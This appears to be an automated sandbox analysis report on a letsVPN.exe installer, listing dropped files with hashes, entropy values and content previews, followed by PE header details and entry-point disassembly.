                                                                                                                                                                                                  Preview:L..................F.... ....-.D.D....:|.Z...-.D.D.. ............................P.O. .:i.....+00.../C:\.....................1......Y.{..PROGRA~2.........O.I.Y.{....................V........P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....V.1......Y.{..letsvpn.@......Y.{.Y.{..........................V.H.l.e.t.s.v.p.n.....b.2. ....YU4 .LetsPRO.exe.H......YU4.Y.{..............................L.e.t.s.P.R.O...e.x.e.......Y...............-.......X.............#......C:\Program Files (x86)\letsvpn\LetsPRO.exe..0.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.l.e.t.s.v.p.n.\.L.e.t.s.P.R.O...e.x.e...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.l.e.t.s.v.p.n.........*................@Z|...K.J.........`.......X.......932923...........hT..CrF.f4... ..*......,...W..hT..CrF.f4... ..*......,...W..............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3.........9
                                                                                                                                                                                                  Process:C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exe
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):258328
                                                                                                                                                                                                  Entropy (8bit):6.64001582449504
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:/BstfXX0BcNv96T+CZxJK30D62E9NTBqCmN1BIKXXuo:pI0Bc/Y5K3m62E9NTsCmNg2V
                                                                                                                                                                                                  MD5:68411B35F7B40B45AFC4A60A2681549D
                                                                                                                                                                                                  SHA1:98377319160E6DA97FD6E5D97AFE2441E0FE21A6
                                                                                                                                                                                                  SHA-256:5C3A73321F59CDC28164D79E8B60ECC57A90FF398A2CDBDE2BB718C8E9500D23
                                                                                                                                                                                                  SHA-512:CC509C4F41F86C9191BF5FBB826A362FFEF2BC78046B99356F944F39A17ED1AB17A6286FFE6AD03C290F6BBCE492F0DE96954B4C1075B27771C491C2CA027156
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):209725
                                                                                                                                                                                                  Entropy (8bit):7.999155296684028
                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                  SSDEEP:3072:bV6ppx9d6U0IqLcls38CNNvbW0ZouvuEVjzR00GSMtIILB/FjzpajiE5liIw8/K+:84Ibls3BNvb9ouxk9BLDzKiMiQ/Ko+y9
                                                                                                                                                                                                  MD5:242BB7507E0B2A8038F847830F926FEC
                                                                                                                                                                                                  SHA1:C391FC67566884065EB8A16961E5405D5B44677B
                                                                                                                                                                                                  SHA-256:7BAB7993F44F9835A44FC93CCE3D513FCBAE2395DAC085DB7F0748B2A21CCA32
                                                                                                                                                                                                  SHA-512:E0E4A997638BF95A558EBB877A2D5E64F2D3A2D2A81D7F15C4453B194E18F3A5BC07589EDB3BC18FDCE1996CFB50B0B00D1FFDF421002E37608EB861F3E7D36C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2482688
                                                                                                                                                                                                  Entropy (8bit):6.599322698372088
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:49152:HymviY7ZdM+3023FbNifZoGlBP3+IoA7YRAt+RB48UOexIFQHkaS5Jv/PfT:HziCdt3023FbNifZ1D3+IoEt+RS8UOel
                                                                                                                                                                                                  MD5:72ADFBFC97B1F1E7ABA3F63CD264C0B2
                                                                                                                                                                                                  SHA1:93DFEBD64B0FC0AA932E23A5D4E6A32CEBE7CF32
                                                                                                                                                                                                  SHA-256:77762C479E46D1DF205EB020D4C1AF5CCD8E433111DC63BE53B2401C7B8257AC
                                                                                                                                                                                                  SHA-512:7AF6E43B7C6086646D1CAC37234658722ABDF466689AB58459468095722E66DB0ED008DA5B2F731D8FB28F60F52EA1FD0C3501C47A79678EB1F6392AF61CB004
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):455328
                                                                                                                                                                                                  Entropy (8bit):6.698367093574994
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:uZ/8wcqw2oe+Z3VrfwfNOOoWhUgiW6QR7t5ss3Ooc8DHkC2e77/:W/8wVwHZFTwFOOos3Ooc8DHkC2e77/
                                                                                                                                                                                                  MD5:FD5CABBE52272BD76007B68186EBAF00
                                                                                                                                                                                                  SHA1:EFD1E306C1092C17F6944CC6BF9A1BFAD4D14613
                                                                                                                                                                                                  SHA-256:87C42CA155473E4E71857D03497C8CBC28FA8FF7F2C8D72E8A1F39B71078F608
                                                                                                                                                                                                  SHA-512:1563C8257D85274267089CD4AEAC0884A2A300FF17F84BDB64D567300543AA9CD57101D8408D0077B01A600DDF2E804F7890902C2590AF103D2C53FF03D9E4A5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):970912
                                                                                                                                                                                                  Entropy (8bit):6.9649735952029515
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:LBmFyjLAOQaYkxGXPfY7eiWWcpOKnpTVOIxhK765qlRRb6x4pI23IbJQV:dmFyjLF847eiWWcoGZVOIxh/WxIAIbGV
                                                                                                                                                                                                  MD5:034CCADC1C073E4216E9466B720F9849
                                                                                                                                                                                                  SHA1:F19E9D8317161EDC7D3E963CC0FC46BD5E4A55A1
                                                                                                                                                                                                  SHA-256:86E39B5995AF0E042FCDAA85FE2AEFD7C9DDC7AD65E6327BD5E7058BC3AB615F
                                                                                                                                                                                                  SHA-512:5F11EF92D936669EE834A5CEF5C7D0E7703BF05D03DC4F09B9DCFE048D7D5ADFAAB6A9C7F42E8080A5E9AAD44A35F39F3940D5CCA20623D9CAFE373C635570F7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\Windows\System32\drvinst.exe
                                                                                                                                                                                                  File Type:Windows setup INFormation
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):7632
                                                                                                                                                                                                  Entropy (8bit):5.063558190257152
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:wr8tW9yCTi3x4vlQd22bjR+iAUC7bMP+io3DcNSj6jvKFkPs7EQTXvt1Ld4Z:LWlGNdkkzo3DcNSj6jvKFkPs7EQTXvtk
                                                                                                                                                                                                  MD5:26009F092BA352C1A64322268B47E0E3
                                                                                                                                                                                                  SHA1:E1B2220CD8DCAEF6F7411A527705BD90A5922099
                                                                                                                                                                                                  SHA-256:150EF8EB07532146F833DC020C02238161043260B8A565C3CFCB2365BAD980D9
                                                                                                                                                                                                  SHA-512:C18111982CA233A7FC5D1E893F9BD8A3ED739756A47651E0638DEBB0704066AF6B25942C7961CDEEDF953A206EB159FE50E0E10055C40B68EB0D22F6064BB363
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:; ****************************************************************************..; * Copyright (C) 2002-2014 OpenVPN Technologies, Inc. *..; * This program is free software; you can redistribute it and/or modify *..; * it under the terms of the GNU General Public License version 2 *..; * as published by the Free Software Foundation. *..; ****************************************************************************....; SYNTAX CHECKER..; cd \WINDDK\3790\tools\chkinf..; chkinf c:\src\openvpn\tap-win32\i386\oemvista.inf..; OUTPUT -> file:///c:/WINDDK/3790/tools/chkinf/htm/c%23+src+openvpn+tap-win32+i386+__OemWin2k.htm....; INSTALL/REMOVE DRIVER..; tapinstall install OemVista.inf tapoas..; tapinstall update OemVista.inf tapoas..; tapinstall remove tapoas....;*********************************************************..; Note to Developers:..;..; If you are bundling the TAP-Windows driver with your app,..; you should try
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\driver\tapinstall.exe
                                                                                                                                                                                                  File Type:Generic INItialization configuration [BeginLog]
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):58514
                                                                                                                                                                                                  Entropy (8bit):5.205553346342785
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:OGdni80C/8g0atRf7yr14ujuNY9AZi3Z/oUtwrP3UQGSE2546vek/LAAiaig4SU3:Own95cdyYloiwTyz25wk/ZiFSk
                                                                                                                                                                                                  MD5:B4502F5083883838B6FABB67BAF7EFD2
                                                                                                                                                                                                  SHA1:ADA8A6E5300D5B5D2B2EF024F6E6B29C226F65D6
                                                                                                                                                                                                  SHA-256:48966AC99217F865843C63237D2FF7039B9A4E065291671CCCFCF22B58D84B05
                                                                                                                                                                                                  SHA-512:A5BF4E69DE6260DFE3B3505E2C14A6997AD0857E4D7D64DE60C8F86458DFDF22FD52DD60158C162AA144AD99BA2447C65CB1707B0F0FC88FEBE5D5C30E8A0C13
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:[Device Install Log].. OS Version = 10.0.19045.. Service Pack = 0.0.. Suite = 0x0100.. ProductType = 1.. Architecture = amd64....[BeginLog]....[Boot Session: 2023/10/03 09:57:02.288]....>>> [Setup Import Driver Package - C:\Windows\system32\spool\tools\Microsoft Print To PDF\prnms009.Inf]..>>> Section start 2023/10/03 09:57:37.904.. cmd: C:\Windows\System32\spoolsv.exe.. inf: Provider: Microsoft.. inf: Class GUID: {4D36E979-E325-11CE-BFC1-08002BE10318}.. inf: Driver Version: 06/21/2006,10.0.19041.1806.. inf: Catalog File: prnms009.cat.. ump: Import flags: 0x0000000D.. pol: {Driver package policy check} 09:57:37.920.. pol: {Driver package policy check - exit(0x00000000)} 09:57:37.920.. sto: {Stage Driver Package: C:\Windows\system32\spool\tools\Microsoft Print To PDF\prnms009.Inf} 09:57:37.920.. inf: {Query Configurability: C:\Windows\system32\spool\tools\Microsoft Print To PDF\prnms009.Inf} 09:57:37.920.. inf:
                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):589824
                                                                                                                                                                                                  Entropy (8bit):0.38537297996661046
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:qLZm8DmT1xMS92sICkjd0x5AUko5HOLboAcKYzFlgbmSBo:qLvM7mjhRoZO/oAPT+
                                                                                                                                                                                                  MD5:5787DB572B03088BD9651D5B760ECD16
                                                                                                                                                                                                  SHA1:4F05A9B32FAAEA469139DA20E74E4ED591E56813
                                                                                                                                                                                                  SHA-256:74F11533EB87312ADA4A6FB869231846C551D6FD5393FDD6C1F955DCE17D4F3B
                                                                                                                                                                                                  SHA-512:287CDE065A5B6D773A47FE7018034C2C488450CD0821BD27E068C4BFAB2D5E74073BCD7D6738F6D5C7DC8726BD721C2E6120199E131F58E312F6638A0CA127A1
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:....8...8.......................................P...!....................................?......................eJ......g<l..Z..Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.6.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.6.1...........................................................@K5..............?..............N.e.t.C.f.g.T.r.a.c.e...C.:.\.W.i.n.d.o.w.s.\.L.o.g.s.\.N.e.t.S.e.t.u.p.\.s.e.r.v.i.c.e...0...e.t.l.........P.P..........?..................................................................8.B..?......19041.1.amd64fre.vb_release.191206-1406.....5.@..?.........gP.......U..l....NetSetupShim.pdb.b......7.@..?.......I.[.8+m.!N8$......NetSetupEngine.pdb......4.@..?.........>*.....Nr8..a....NetSetupApi.pdb.........4.@..?.........E_iC...F........NetSetupSvc.pdb.............................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):55
                                                                                                                                                                                                  Entropy (8bit):4.306461250274409
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                                  MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                  SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                  SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                  SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                                                                                  Process:C:\Windows\System32\drvinst.exe
                                                                                                                                                                                                  File Type:Windows setup INFormation
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):7632
                                                                                                                                                                                                  Entropy (8bit):5.063558190257152
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:wr8tW9yCTi3x4vlQd22bjR+iAUC7bMP+io3DcNSj6jvKFkPs7EQTXvt1Ld4Z:LWlGNdkkzo3DcNSj6jvKFkPs7EQTXvtk
                                                                                                                                                                                                  MD5:26009F092BA352C1A64322268B47E0E3
                                                                                                                                                                                                  SHA1:E1B2220CD8DCAEF6F7411A527705BD90A5922099
                                                                                                                                                                                                  SHA-256:150EF8EB07532146F833DC020C02238161043260B8A565C3CFCB2365BAD980D9
                                                                                                                                                                                                  SHA-512:C18111982CA233A7FC5D1E893F9BD8A3ED739756A47651E0638DEBB0704066AF6B25942C7961CDEEDF953A206EB159FE50E0E10055C40B68EB0D22F6064BB363
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:; ****************************************************************************..; * Copyright (C) 2002-2014 OpenVPN Technologies, Inc. *..; * This program is free software; you can redistribute it and/or modify *..; * it under the terms of the GNU General Public License version 2 *..; * as published by the Free Software Foundation. *..; ****************************************************************************....; SYNTAX CHECKER..; cd \WINDDK\3790\tools\chkinf..; chkinf c:\src\openvpn\tap-win32\i386\oemvista.inf..; OUTPUT -> file:///c:/WINDDK/3790/tools/chkinf/htm/c%23+src+openvpn+tap-win32+i386+__OemWin2k.htm....; INSTALL/REMOVE DRIVER..; tapinstall install OemVista.inf tapoas..; tapinstall update OemVista.inf tapoas..; tapinstall remove tapoas....;*********************************************************..; Note to Developers:..;..; If you are bundling the TAP-Windows driver with your app,..; you should try
                                                                                                                                                                                                  Process:C:\Windows\System32\drvinst.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):10739
                                                                                                                                                                                                  Entropy (8bit):7.214364446291792
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:JDVLGVDFfap5UEwQl/WGhYCt17vJ4qnaj6jQc:7GCpzlnh3t1x4l2jn
                                                                                                                                                                                                  MD5:F73AC62E8DF97FAF3FC8D83E7F71BF3F
                                                                                                                                                                                                  SHA1:619A6E8F7A9803A4C71F73060649903606BEAF4E
                                                                                                                                                                                                  SHA-256:CC74CDB88C198EB00AEF4CAA20BF1FDA9256917713A916E6B94435CD4DCB7F7B
                                                                                                                                                                                                  SHA-512:F81F5757E0E449AD66A632299BCBE268ED02DF61333A304DCCAFB76B2AD26BAF1A09E7F837762EE4780AFB47D90A09BF07CB5B8B519C6FB231B54FA4FBE17FFE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:0.)...*.H........).0.)....1.0...`.H.e......0..i..+.....7.....Z0..V0...+.....7.......r?.X.M.....F.A..201008141946Z0...+.....7.....0..T0.... .....S!F.3....#.a.2`..e...#e...1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0<..+.....7...1.0,...F.i.l.e........o.e.m.v.i.s.t.a...i.n.f...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... .....S!F.3....#.a.2`..e...#e...0...."~..m..8C. i$.4.l..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0:..+.....7...1,0*...F.i.l.e........t.a.p.0.9.0.1...s.y.s...0.... ..j(.M<.cR..XrT....F..R.]....?1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0:..+.....7...1,0*...F.i.l.e........t.a.p.0.9.0.1...s.y.s...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... ..j(.M<.cR..XrT....F..R.]....?0.....".....A.Rw..... .1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0<..+.....7...1.0,...F.i.l.e........o.e.m.v.i.s.t.a...i.n.f.......0...0....+.
                                                                                                                                                                                                  Process:C:\Windows\System32\drvinst.exe
                                                                                                                                                                                                  File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):39920
                                                                                                                                                                                                  Entropy (8bit):6.338128217115975
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:XtCuL1O/+AphG3F9NlXt5oZhDzbV104mmuiExsFwQvYp33U35:XdCoTxk1lmmjExsFNvYtk
                                                                                                                                                                                                  MD5:C10CCDEC5D7AF458E726A51BB3CDC732
                                                                                                                                                                                                  SHA1:0553AAB8C2106ABB4120353360D747B0A2B4C94F
                                                                                                                                                                                                  SHA-256:589C5667B1602837205DA8EA8E92FE13F8C36048B293DF931C99B39641052253
                                                                                                                                                                                                  SHA-512:7437C12AE5B31E389DE3053A55996E7A0D30689C6E0D10BDE28F1FBF55CEE42E65AA441B7B82448334E725C0899384DEE2645CE5C311F3A3CFC68E42AD046981
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........~..[...[...[....w..Z....w..^...[...m....w.._....w..^.../t..Q.../t..Z.../t..Z...Rich[...........................PE..d......_.........."......Z.....................@....................................=w....`A....................................................<.......X....p..T....x...#...........R..8............................S...............P...............................text..._>.......@.................. ..h.rdata.......P.......D..............@..H.data........`.......P..............@....pdata..T....p.......R..............@..HPAGE.................V.............. ..`INIT.................d.............. ..b.rsrc...X............p..............@..B.reloc...............v..............@..B................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Windows\System32\drvinst.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                  Size (bytes):3474
                                                                                                                                                                                                  Entropy (8bit):5.367100074109882
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:QO00eO00erMwUgWUg0B1kE3ZhpJp8ZpkRepk3YpgpN3O:QO00eO00erMwmkB1kAs
                                                                                                                                                                                                  MD5:43443B66132BCFD9F716077CDD301784
                                                                                                                                                                                                  SHA1:01D4D1025A9B49FCA9704B9461AFED8B64A3D9D2
                                                                                                                                                                                                  SHA-256:85F6B0E1882D6732913507956EA5F9C86D1F0ADABADC2443A02391AE0BABC80D
                                                                                                                                                                                                  SHA-512:A8B4C6B56223F7E4C01E86DA59F0C80FC152EEF7B1B9B1260D8A0DCB604D1CBBBB12D36E57ACEC0E92561F7CC3FAFA7422D2C8E37C1EC6607F1BB46D02588AA5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #6041 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #6699 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #4398 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #6041 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #6699 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #4398 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #2083 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #2459 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: SyncAllDBs Corruption or Schema Change..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #891 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #1307 encountered JET error -1601..CatalogDB: 08:57:12 03/10/2023: SyncDB:: Sync sta
                                                                                                                                                                                                  Process:C:\Windows\System32\drvinst.exe
                                                                                                                                                                                                  File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):39920
                                                                                                                                                                                                  Entropy (8bit):6.338128217115975
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:XtCuL1O/+AphG3F9NlXt5oZhDzbV104mmuiExsFwQvYp33U35:XdCoTxk1lmmjExsFNvYtk
                                                                                                                                                                                                  MD5:C10CCDEC5D7AF458E726A51BB3CDC732
                                                                                                                                                                                                  SHA1:0553AAB8C2106ABB4120353360D747B0A2B4C94F
                                                                                                                                                                                                  SHA-256:589C5667B1602837205DA8EA8E92FE13F8C36048B293DF931C99B39641052253
                                                                                                                                                                                                  SHA-512:7437C12AE5B31E389DE3053A55996E7A0D30689C6E0D10BDE28F1FBF55CEE42E65AA441B7B82448334E725C0899384DEE2645CE5C311F3A3CFC68E42AD046981
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\Windows\System32\netsh.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:y:y
                                                                                                                                                                                                  MD5:81051BCC2CF1BEDF378224B0A93E2877
                                                                                                                                                                                                  SHA1:BA8AB5A0280B953AA97435FF8946CBCBB2755A27
                                                                                                                                                                                                  SHA-256:7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
                                                                                                                                                                                                  SHA-512:1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:..
                                                                                                                                                                                                  File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                  Entropy (8bit):7.951733059880656
                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                  • Win64 Executable GUI (202006/5) 77.37%
                                                                                                                                                                                                  • InstallShield setup (43055/19) 16.49%
                                                                                                                                                                                                  • Win64 Executable (generic) (12005/4) 4.60%
                                                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.77%
                                                                                                                                                                                                  • DOS Executable Generic (2002/1) 0.77%
                                                                                                                                                                                                  File name:letsVPN.exe
                                                                                                                                                                                                  File size:33'128'448 bytes
                                                                                                                                                                                                  MD5:ef0f5b020ea3238a98642cd7b56d84bb
                                                                                                                                                                                                  SHA1:9bfb209e7d43739cc9dea530680b0c4ecdbf5981
                                                                                                                                                                                                  SHA256:abf9a5632221e9fe423c9eeeb4c205497bf5bb1ff4aad8561609d81eaa82976e
                                                                                                                                                                                                  SHA512:cae5d82e433a68f3e1770ed21cd80479f4fa49fea367e0a6b28a8a5743dbc8feb658bc4c1171c514ce957a34a26c49541403745293b51d13a3c4bcaeca79d3e7
                                                                                                                                                                                                  SSDEEP:393216:eKb0lwDQigr/AwoVsxGxbiDDzWzmJ/2inHWazagVdtBrx8wXpZVYcs7:twuEiyoWG0DDzWCgin/tB97YF
                                                                                                                                                                                                  TLSH:74771202E78192F9D86DC035869B2B32F7A0B44A4735AAEB6BD153E50B75FC01E3871D
                                                                                                                                                                                                  Icon Hash:804ceccc64ece837
                                                                                                                                                                                                  Entrypoint:0x140062e64
                                                                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                                                                  Digitally signed:false
                                                                                                                                                                                                  Imagebase:0x140000000
                                                                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                  DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                                                                                  Time Stamp:0x6770F00A [Sun Dec 29 06:45:30 2024 UTC]
                                                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                                                  OS Version Major:5
                                                                                                                                                                                                  OS Version Minor:2
                                                                                                                                                                                                  File Version Major:5
                                                                                                                                                                                                  File Version Minor:2
                                                                                                                                                                                                  Subsystem Version Major:5
                                                                                                                                                                                                  Subsystem Version Minor:2
                                                                                                                                                                                                  Import Hash:edafe69053cd166dc7264345550f7ddd
                                                                                                                                                                                                  Instruction
                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                  sub esp, 28h
                                                                                                                                                                                                  call 00007F5160B73174h
                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                  add esp, 28h
                                                                                                                                                                                                  jmp 00007F5160B6A157h
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  nop word ptr [eax+eax+00000000h]
                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                  mov eax, ecx
                                                                                                                                                                                                  dec ecx
                                                                                                                                                                                                  cmp eax, 08h
                                                                                                                                                                                                  jc 00007F5160B6A395h
                                                                                                                                                                                                  movzx edx, dl
                                                                                                                                                                                                  dec ecx
                                                                                                                                                                                                  mov ecx, 01010101h
                                                                                                                                                                                                  add dword ptr [ecx], eax
                                                                                                                                                                                                  add dword ptr [ecx], eax
                                                                                                                                                                                                  dec ecx
Programming Language:
• [ C ] VS2005 build 50727
• [IMP] VS2005 build 50727
• [ C ] VS2008 SP1 build 30729
• [ASM] VS2008 SP1 build 30729
• [C++] VS2008 SP1 build 30729
• [RES] VS2008 build 21022
• [LNK] VS2008 SP1 build 30729

| Name | Virtual Address | Virtual Size | Is in Section |
| --- | --- | --- | --- |
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0xad8b0 | 0x104 | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x1f8e000 | 0x12d30 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x1f84000 | 0x96d8 | .pdata |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x81000 | 0xf40 | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
